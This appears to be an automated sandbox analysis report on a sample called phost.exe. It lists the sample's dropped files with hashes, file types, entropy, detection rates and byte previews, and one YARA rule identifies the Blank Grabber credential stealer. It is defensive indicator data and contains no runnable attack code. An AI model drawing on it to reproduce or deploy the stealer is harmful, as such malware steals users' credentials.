SSDEEP: 768:O1X8HEfobVbgwsIZsQD182/q2vQttkmnIzPnzTpwOgIGLwgBT5YiSyvvBAMxkEn:CXz0gwsGsQD1ZbmiSOgIGLwgBd7SyZxL
MD5: F6D0876B14BCA5A264EC231895D80072
SHA1: D68B662CFC247C07851EF0764FE9652E3E2C0981
SHA-256: BCBF9A952473E53F130CE77B0DB69FE08C5845CE10DBE8C320B40F171A15D6A8
SHA-512: 1DB02975634FFCC4E73FAC355D7F67A915C3B4189FEAF9E7B24EF831E9F4A2E60A4BD1EBFD8157282A4094814332D62957FCD204B20F2904527E203AB355AB8E
Malicious: false
Antivirus: ReversingLabs, Detection: 4%
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J./.+z|.+z|.+z|.S.|.+z|.W{}.+z|.W.}.+z|.W~}.+z|.Wy}.+z|}V{}.+z|.+{|.+z|.S{}.+z|}Vw}.+z|}Vz}.+z|}V.|.+z|}Vx}.+z|Rich.+z|................PE..d......e.........." ...#.p.......... q....................................................`.........................................D...P....................0......................................................0}..@...........................................UPX0....................................UPX1.....p.......p..................@....rsrc................t..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

Process: C:\Users\user\Desktop\phost.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 59160
Entropy (8bit): 7.835515959807496
Encrypted: false
SSDEEP: 1536:e5ovI/e3wTAiHXhchuXbLfbmmKTnjBChRDLHKVIGOQQm7Syxx2e:e5fXAcew9KTjBCh1kIGOQQml
MD5: 0FDEDCB9B3A45152239CA4B1AEA4B211
SHA1: 1CCFF1F5E7B27C4156A231AD7A03BCC9695C5B92
SHA-256: 0FC03D25467850181C0FC4F0F8919C8C47CBA2BF578698D4354AA84FD810C7F7
SHA-512: 8CE5B38EE64AC0CDA831B6B2C746FB95BAADDA83665D8E125EAA8B4A07CB61B3EF88D60741B978B2108EC08B067F1C9C934099F539B1E24F55E3CA8350359611
Malicious: false
Antivirus: ReversingLabs, Detection: 4%
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@.g...g...g.......g..../..g......g....+..g....*..g....-..g..q./..g..../..g...g/..f..q.#..g..q....g..q...g..q.,..g..Rich.g..........PE..d......e.........." ...#.........p.. ........................................@............`..........................................;..P....9.......0..........8............;...................................... %..@...........................................UPX0.....p..............................UPX1................................@....rsrc........0......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

Process: C:\Users\user\Desktop\phost.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 67352
Entropy (8bit): 7.856108604878049
Encrypted: false
SSDEEP: 1536:URuyAdinkEweTTDWPnQfNnPAdu8LfPXrBIGC777m7Synx5:2F9fEo58DPXdIGC77yN
MD5: 53996068AE9CF68619DA8CB142410D5E
SHA1: 9EB7465D6F22AB03DAC04CFCE668811A87E198F2
SHA-256: CBD320C42277086CD962FD0B25842904CEB436346D380319625F54363F031DCF
SHA-512: D5FBC53A2FFFECB1F3DA4B126E306961DE3B8070B5F722B6ED5E20BEF6AF48D52EDF96C975F68278E337BC78A25B4227E9EB44B51BAA786365A67CF977E4643E
Malicious: false
Antivirus: ReversingLabs, Detection: 4%
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U.k.4.8.4.8.4.8.L)8.4.8.H.9.4.8.H.9.4.8.H.9.4.8.H.9.4.8kI.9.4.8.4.8#5.8.L.9.4.8kI.9.4.8kI.9.4.8kIE8.4.8kI.9.4.8Rich.4.8........................PE..d......e.........." ...#.........@.......P...................................0............`.........................................l,..d....)....... ..........8............,..........................................@...........................................UPX0.....@..............................UPX1.........P......................@....rsrc........ ......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

Process: C:\Users\user\Desktop\phost.exe
File Type: Zip archive data, at least v2.0 to extract, compression method=store
Category: dropped
Size (bytes): 1329520
Entropy (8bit): 5.586655762137983
Encrypted: false
SSDEEP: 12288:uttcY+b+vOmgRF1+fYNXPh26UZWAzCu7j5D95wdgkVodYOPjwwMJ9gCCaYc2I:uttcY+mHCiCA5TNqodYOPEPEaYc2I
MD5: 898E35281A756640780DBC31A0B78452
SHA1: 845B59CFD9FB152725F250A872E9D1D7A66AF258
SHA-256: 0DAA440C78582A693DABBC2325A06D817131BB170BAD436B126BAD896F1377CD
SHA-512: 421CC4A15E94293E53F1039B8BB5BE7EDCBC8E3E0E4ABC7F34FAF991993F51CB5F51493B58BB341CB9579347EC134B02104454075A8E7E33E45B8E3A66A44D79
Malicious: false
Reputation: unknown
Preview: PK..........!.x[_C............_collections_abc.pyc......................................Z.....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.............Z...e.d.........Z.d...Z...e.e.........Z.[.g.d...Z.d.Z...e...e.d.................Z...e...e...e.........................Z...e...e.i.j%..........................................Z...e...e.i.j)..........................................Z...e...e.i.j-..........................................Z...e...e.g.................Z...e...e...e.g.........................Z...e...e...e.d.........................Z...e...e...e.d.d.z...........................Z...e...e...e.........................Z...e...e.d.................Z ..e...e.d.................Z!..e...e...e"........................Z#..e.i.j%..................................Z$..e.i.j)..................................Z%..e.i.j-..................................Z&..e.e.jN..........................Z(..e...d...................Z)d...Z*..e*........Z*..e.e*........Z+e*jY............................[*d...Z-..e-........
Process: C:\Users\user\Desktop\phost.exe
File Type: Zip archive data, at least v2.0 to extract, compression method=store
Category: dropped
Size (bytes): 110302
Entropy (8bit): 7.76600595304077
Encrypted: false
SSDEEP: 3072:bWwadoInRQfg0tr7VIXK9kVqYy/XZaWjoYp88TP4Kb:ba6KzixQOkVqYWXZaWjxpPP
MD5: 504E4173AAA7A26BDD8D03DE460B8361
SHA1: F11272BD0EAD47DD82AF12ACB38292913803BA87
SHA-256: ACD828587F1820C3AE85091B332CC5A6D56385A7516639772EB67A0FF2ABEB1A
SHA-512: B6442DB7005CB0D374FA6BB8A82890E1B4D8CF3EE6774149DFBC3B40EC527D8EF40E66AFAF7355CEFE8BA54E287EBE458E3554BF5C843BAA6C5A7F5243B4B13F
Malicious: false
Reputation: unknown
Process: C:\Users\user\Desktop\phost.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1629464
Entropy (8bit): 7.952620301087112
Encrypted: false
SSDEEP: 49152:AMyDwbv70aKbP1zkLO5YHLA1CPwDvt3uFlDCZ:kwbv77KbPaqYHLA1CPwDvt3uFlDCZ
MD5: 27515B5BB912701ABB4DFAD186B1DA1F
SHA1: 3FCC7E9C909B8D46A2566FB3B1405A1C1E54D411
SHA-256: FE80BD2568F8628032921FE7107BD611257FF64C679C6386EF24BA25271B348A
SHA-512: 087DFDEDE2A2E6EDB3131F4FDE2C4DF25161BEE9578247CE5EC2BCE03E17834898EB8D18D1C694E4A8C5554AD41392D957E750239D3684A51A19993D3F32613C
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation: unknown
Process: C:\Users\user\Desktop\phost.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 29968
Entropy (8bit): 7.677818197322094
Encrypted: false
SSDEEP: 768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
MD5: 08B000C3D990BC018FCB91A1E175E06E
SHA1: BD0CE09BB3414D11C91316113C2BECFFF0862D0D
SHA-256: 135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
SHA-512: 8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation: unknown
Process: C:\Users\user\Desktop\phost.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 229144
Entropy (8bit): 7.930038440560372
Encrypted: false
SSDEEP: 3072:SFfmvsqWLSCMT+MyN6Qp2oZqpN+/fvrqknqbf6CjaBGkfPkZAK1ck2kBVfLwOmFd:SFevsT9JN+vyH1nqLr3CPrYBBRcd
MD5: 6EDA5A055B164E5E798429DCD94F5B88
SHA1: 2C5494379D1EFE6B0A101801E09F10A7CB82DBE9
SHA-256: 377DA6175C8A3815D164561350AE1DF22E024BC84C55AE5D2583B51DFD0A19A8
SHA-512: 74283B4051751F9E4FD0F4B92CA4B953226C155FE4730D737D7CE41A563D6F212DA770E96506D1713D8327D6FEF94BAE4528336EBCFB07E779DE0E0F0CB31F2E
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation: unknown
Process: C:\Users\user\Desktop\phost.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1826072
Entropy (8bit): 7.993990461497291
Encrypted: true
SSDEEP: 49152:fTBxkJIkNEakpCPK1JQyHi3p70PHY6/g7:teFNlUsK1ij31WYUW
MD5: 86D9B8B15B0340D6EC235E980C05C3BE
SHA1: A03BDD45215A0381DCB3B22408DBC1F564661C73
SHA-256: 12DBBCD67015D6CDB680752184107B7DEB84E906B0E8E860385F85D33858A5F6
SHA-512: D360CC3F00D90FD04CBBA09D879E2826968DF0C1FDC44890C60B8450FE028C3E767450C3543C62D4F284FB7E004A9A33C52538C2279221EE6CBDB1A9485F88B2
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 4%
Reputation: unknown
Process: C:\Users\user\Desktop\phost.exe
File Type: PE32+ executable (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 630736
Entropy (8bit): 6.409476333013752
Encrypted: false
SSDEEP: 12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
MD5: 9C223575AE5B9544BC3D69AC6364F75E
SHA1: 8A1CB5EE02C742E937FEBC57609AC312247BA386
SHA-256: 90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
SHA-512: 57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation: unknown
Process: C:\Users\user\Desktop\phost.exe
File Type: ASCII text
Category: dropped
Size (bytes): 456
Entropy (8bit): 4.447296373872587
Encrypted: false
SSDEEP: 12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
MD5: 4531984CAD7DACF24C086830068C4ABE
SHA1: FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
SHA-256: 58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
SHA-512: 00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
Malicious: true
Yara Hits:
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rarreg.key, Author: Joe Security
Reputation: unknown
Preview: RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\phost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):26392
                                                                                                                                                                                                                            Entropy (8bit):7.448215150146329
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:qnyukFaypXM5IGQGNf5YiSyvTcAMxkEMrX:qnGAaM5IGQGNR7Syb6xuX
                                                                                                                                                                                                                            MD5:CCE3E60EC05C80F5F5EE014BC933554C
                                                                                                                                                                                                                            SHA1:468D2757B201D6259034215CFD912E8E883F4B9E
                                                                                                                                                                                                                            SHA-256:84A81CCA6D80EDD9EC2D31926231DE393ED7F26ED86AE39219ADC5EAB24B8100
                                                                                                                                                                                                                            SHA-512:7CBCEE4DD4C817FBEF8B9AEF2D457B56970C5E5C03BDF2CAF74415316B44E7DA33EE39B6A434F4760C80F74C33B5C0C5AD00936D438B947A39FFCD53E890CF0C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........t.q|'.q|'.q|'...'.q|'q.}&.q|'q.y&.q|'q.x&.q|'q..&.q|'..}&.q|'.q}'.q|'..}&.q|'..q&.q|'..|&.q|'...'.q|'..~&.q|'Rich.q|'........PE..d...Z..e.........." ...#.0................................................................`......................................... ...L....................`..............l..........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\phost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):637720
                                                                                                                                                                                                                            Entropy (8bit):7.993319352541641
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:12288:kevMEHnoed8VDT4Rc+iHsLG56RY+hPQHAnxeIglZsk2F24ZHL2Ubsi2UTwYqmH:k8oy8x4Rl1dRnxeDlZxsl2MsD0w9mH
                                                                                                                                                                                                                            MD5:C6ED91B8FDB99EBA4C099EB6D0EEA5D9
                                                                                                                                                                                                                            SHA1:915B2D004F3F07CD18610E413B087568258DA866
                                                                                                                                                                                                                            SHA-256:E6E1910E237AC7847748918804D1C414C0F1696A29E9718739312A233EB96D80
                                                                                                                                                                                                                            SHA-512:92FE738FCD75E39C6BC9F1EDB3B16A1A7CF3AE6C0D2C29C721B1A5BD3E07A4BB8E8295B3AD3CB44BCEE05A8110855B0FEA66B156461C4F1761C53C15D7E67EE5
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W..W..W..^.P.[....U....Z...._.....S.....T..W........V.....V....<.V......V..RichW..........................PE..d......e.........." ...#.`...0.......*.......................................p............`..........................................K..."...H.......@.......................m.......................................7..@...........................................UPX0....................................UPX1.....`.......Z..................@....rsrc....0...@.......^..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\phost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):302872
                                                                                                                                                                                                                            Entropy (8bit):7.986491235737331
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:OtX6biS7ltWh4BvaEyS+KPUR30JlSEwV7hqoUnJG4qKOF6J:OZLS5YiyEFPPl3yqrJG4V06J
                                                                                                                                                                                                                            MD5:427668E55E99222B3F031B46FB888F3A
                                                                                                                                                                                                                            SHA1:C9BE630CB2536C20BBC6FC9BA4A57889CDB684BC
                                                                                                                                                                                                                            SHA-256:9CA1B01048D3867CB002A01A148F279BA9EDAF7B7AD04D17E3E911E445F2D831
                                                                                                                                                                                                                            SHA-512:E5CA0DDC2758891090DB726DE2D3FD7F2BA64E309979136B4D3299445B1F751DFD8CD56BB3343499CB6ED479C08732D1D349D32B7F7E5AC417352BD0CE676253
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w...3m..3m..3m..:...5m......1m......>m......;m......0m......0m..x...1m..3m..cm......2m......2m....j.2m......2m..Rich3m..................PE..d...]..e.........." ...#.`.......0.......@................................................`.............................................X....................@..........................................................@...........................................UPX0.....0..............................UPX1.....`...@...^..................@....rsrc................b..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
